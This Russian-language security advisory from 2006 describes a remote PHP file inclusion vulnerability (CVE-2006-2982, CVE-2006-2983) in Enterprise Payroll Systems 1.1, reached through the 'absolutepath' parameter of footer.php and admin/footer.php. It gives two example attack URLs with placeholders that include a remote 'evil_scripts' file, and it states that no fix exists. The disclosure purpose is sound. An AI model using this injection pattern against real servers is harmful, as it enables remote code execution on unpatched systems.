PHP-инклюдинг в Enterprise Payroll Systems

Дата публикации:
17.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
2562
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2982
CVE-2006-2983
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Enterprise Payroll Systems 1.x
Уязвимые версии: Enterprise Payroll Systems 1.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "absolutepath" в сценариях footer.php и admin/footer.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/[EPS_path]/footer.php?absolutepath=[evil_scripts]
http://victim/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]

URL производителя: epayroll.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability

или введите имя

CAPTCHA